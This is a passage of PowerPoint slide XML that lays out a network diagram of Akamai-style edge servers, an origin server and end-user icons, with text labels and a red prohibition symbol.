          <a:xfrm>
            <a:off x="7938057" y="953453"/>
            <a:ext cx="982853" cy="982980"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35948" name="Picture 527" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35949" name="Picture 530" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35920" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10502803" y="1713550"/>
            <a:ext cx="666662" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36350" name="Group 536"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10331377" y="1535430"/>
            <a:ext cx="982853" cy="982980"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35946" name="Picture 537" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35947" name="Picture 538" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="322" name="Group 321"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5877650" y="2103120"/>
            <a:ext cx="5635624" cy="4069080"/>
            <a:chOff x="5877650" y="2103120"/>
            <a:chExt cx="5635624" cy="4069080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35937" name="Picture 9" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5980116" y="5382295"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35938" name="Picture 5" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8629286" y="5333192"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35939" name="Picture 11" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8541763" y="2103120"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35940" name="Picture 13" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5877650" y="2229078"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35941" name="Picture 14" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8697597" y="4080018"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35942" name="Picture 15" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6904385" y="4201707"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35945" name="Picture 6" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10591081" y="3332810"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35943" name="Picture 16" descr="Akamai_Server"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7737194" y="2985769"/>
              <a:ext cx="922193" cy="789905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="320" name="Group 411"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10633279" y="3416620"/>
            <a:ext cx="541902" cy="541972"/>
            <a:chOff x="634" y="3500"/>
            <a:chExt cx="295" cy="295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35935" name="Oval 412"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="634" y="3500"/>
              <a:ext cx="295" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1600" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35936" name="Line 413"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="676" y="3542"/>
              <a:ext cx="211" cy="211"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="127000">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9076142" y="4953955"/>
            <a:ext cx="3636173" cy="848677"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 5800 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1703 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 2368 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1562 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 5800 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 1703 h 10000"/>
              <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 5800 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 1703 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
              <a:gd name="connsiteX1" fmla="*/ 3703 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 190 h 10000"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10000 h 10000"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 276 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 5381 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 10000"/>
              <a:gd name="connsiteY0" fmla="*/ 276 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 5381 w 10000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 10000 w 10000"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 59605"/>
              <a:gd name="connsiteY0" fmla="*/ 92 h 12187"/>
              <a:gd name="connsiteX1" fmla="*/ 54986 w 59605"/>
              <a:gd name="connsiteY1" fmla="*/ 1911 h 12187"/>
              <a:gd name="connsiteX2" fmla="*/ 59605 w 59605"/>
              <a:gd name="connsiteY2" fmla="*/ 12187 h 12187"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 59605"/>
              <a:gd name="connsiteY0" fmla="*/ 4816 h 16911"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 59605"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 16911"/>
              <a:gd name="connsiteX2" fmla="*/ 59605 w 59605"/>
              <a:gd name="connsiteY2" fmla="*/ 16911 h 16911"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 59605"/>
              <a:gd name="connsiteY0" fmla="*/ 4467 h 16911"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 59605"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 16911"/>
              <a:gd name="connsiteX2" fmla="*/ 59605 w 59605"/>
              <a:gd name="connsiteY2" fmla="*/ 16911 h 16911"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 68414"/>
              <a:gd name="connsiteY0" fmla="*/ 4467 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 68414"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 68414 w 68414"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 68414"/>
              <a:gd name="connsiteY0" fmla="*/ 4467 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 54042 w 68414"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX2" fmla="*/ 68414 w 68414"/>
              <a:gd name="connsiteY2" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 14372"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10276"/>
              <a:gd name="connsiteX1" fmla="*/ 14372 w 14372"/>
              <a:gd name="connsiteY1" fmla="*/ 10276 h 10276"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 13228"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 10135"/>
              <a:gd name="connsiteX1" fmla="*/ 13228 w 13228"/>
              <a:gd name="connsiteY1" fmla="*/ 10135 h 10135"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13228" h="10135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="457" y="360"/>
                  <a:pt x="9161" y="7617"/>
                  <a:pt x="13228" y="10135"/>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35927" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1424437" y="2336926"/>
            <a:ext cx="1864752" cy="270827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Origin Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35930" name="Picture 35" descr="End_User"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12329463" y="4549141"/>
            <a:ext cx="762853" cy="762953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="321" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12176130" y="4410077"/>
            <a:ext cx="1044757" cy="1044893"/>
            <a:chOff x="19770438" y="6161089"/>
            <a:chExt cx="3879272" cy="3879272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35933" name="Picture 506" descr="End_User-green.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="19770438" y="6161089"/>
              <a:ext cx="3879272" cy="3879272"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35934" name="Picture 508" descr="site1.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="20393891" y="6774874"/>
              <a:ext cx="2743200" cy="2743200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35932" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12438033" y="3978593"/>
            <a:ext cx="1844754" cy="347771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="54850" tIns="27424" rIns="54850" bIns="27424">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>End User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Picture 10" descr="gray_server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3023710" y="3352842"/>
            <a:ext cx="1950720" cy="1247774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35928" name="Picture 567" descr="ms"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" cstate="print"/>
          <a:srcRect b="11740"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1956155" y="2737642"/>
            <a:ext cx="1384755" cy="937260"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="C0C0C0"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="AutoShape 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130096" y="4393340"/>
            <a:ext cx="1374045" cy="3024730"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="54850" tIns="27424" rIns="54850" bIns="27424" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1306018">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Verdana" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
